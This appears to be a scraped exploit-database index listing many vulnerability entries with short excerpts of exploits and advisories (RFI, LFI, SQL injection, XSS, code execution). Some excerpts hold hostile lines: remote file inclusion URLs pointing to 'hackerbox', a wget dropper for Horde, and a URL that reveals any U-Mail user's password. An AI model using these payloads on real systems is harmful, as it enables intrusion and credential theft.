Java Applet Method Handle Remote Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' class...

Web Service Deluxe News Manager 1.0.1 Deluxe Footer.PHP Local File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23499/info News Manager Deluxe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local...

xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)

No description provided by source. !/usr/bin/perl -w XML-RPC Remote Command Execution Exploit By Mike Rifone This works on da phpxmlrpc, and da PEAR XMLRPC too! All you need is to put the url to the server and u get shell Dis is my first exploit but hey it works :D Mike@Rifone use LWP::UserAgent;...

com_loudmouth Mambo Component <= 4.0j - Include Vulnerability

No description provided by source. Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/7911/comloudmouth-4.0j.zip bug found in file abbc.class.php : include...

Halo <= 1.05 Broadcast Client Crash Exploit

No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h ifdef WIN32 include winsock.h / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include string.h include errno.h...

dacio's cms 1.08 (xss/sql/dd) Multiple Vulnerabilities

No description provided by source. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = XORON 2009C = = Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln. = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = =...

CF Image Hosting Script 1.3.8 - Remote File Inclusion

No description provided by source. ================================= CF Image Hosting Script ===remote file inclode ================================= CF Image Hosting Script ===remote file inclode Date: 2010-08-29 Author : FoX HaCkEr Contact : [email protected] SiTe : www.sec4ever.com Download:...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

Job Site 1.0 - Multiple Vulnerabilities

No description provided by source. Jobsite logo - Multiple Vulnerabilties =================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script :...

fcms 2.2.3 - Remote File Inclusion Vulnerability

No description provided by source...

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

How To Jailbreak iOS 7.1 And 7.1.1 Untethered Using 'Pangu' Jailbreak Tool

Quite Surprisingly, a team of Chinese hackers, Pangu have released an untethered jailbreak for iOS 7.1 and iOS 7.1.1. This untethered jailbreak is compatible with iPhone 5s, iPhone 5c, iPhone 4S, iPhone 4, iPad Air, iPad 4, iPad 3, iPad 2, iPad mini, Retina iPad mini and iPod touch 5G running iOS...

CVE-2014-3868

creationtimestamp| type| source ---|---|--- 2014-06-24 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39223...

Wordpress Theme Awake Arbitrary File Download Vulnerability

This exploit allows attacker to download any writable file from the server Usage Info Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly Title : Wordpress Theme Awake Arbitrary File Download Vulnerability Author : Aloulou Date ...

destoon /v5.0/ 存储型xss 指哪打哪(绕过3)

简要描述： destoon /v5.0/ 存储型xss 指哪打哪绕过3 详细说明： 关联url: WooYun: destoon /v5.0/ 存储型xss 指哪打哪绕过2 在发表图库时 未对发送的代码做出过滤 poc M 漏洞证明： 点击就弹了，...

Madness Pro 1.14 - SQL Injection

!/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌ ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌ ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█...

geeklog 2.1.0b1 Local File Include Vulnerability

Exploit for php platform in category web applications ----------exploit Debut Local File Include Vulnerability ----------Author Info Name : JIKO ----------Script Info Site : https://www.geeklog.net/ Download : https://www.geeklog.net/filemgmt/uploaddir/geeklog-2.1.0b1.tar.gz Name : geeklog-2.1.0b...

U-Mail邮件系统获取指定账户权限（任意用户明文密码查询）

简要描述： 可获取该系统指定用户权限，最近看发这套的人挺多的，不知道我这个你们觉得鸡肋不 详细说明： u-mail取回密码处设计不当，导致任意用户密码可越权查看，当update=s时，可查看任意账户密码 http://mail.xxx.com/webmail/[email protected]&update=s 直接查看指定邮箱账户密码 接下来想做什么都可以了。 谷歌: Powered by U-Mail 邮件服务器 官网Demo：...

Anymacro 邮件系统N处SQL注入漏洞

简要描述： 详细说明： 与： WooYun: Anymacro 邮件系统SQL注入漏洞和任意文件（邮件）删除（无需登录） 重复 乌云已经把它列入到通用型奖励厂商当中了。 0x01 背景 AnyMacro（安宁）成立于1999年，是国内领先的统一消息/移动门户/PushMail产品与应用解决方案提供商。主要客户涵盖国家部委、大型企业以及部分海外客户，客户分布于政府、军工、金融、电信、能源、教育等行业。 AnyMacro在技术创新和关键应用中一直处于行业领先地位，在全球首家提出并实现LAMP架构邮件/消息系统已成为事实的行业标准。AnyMacro...

GetSimple CMS 3.3.1 Cross Site Scripting

PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1 CVE-2014-1603 by Pedro Ribeiro [email protected] from Agile Information Security Timeline: 04/11/2013 - Found bugs, produced proof of concept. 05/11/2013 - Communicated to the developer, which acknowledged receipt. 10/01/2014 - Politely...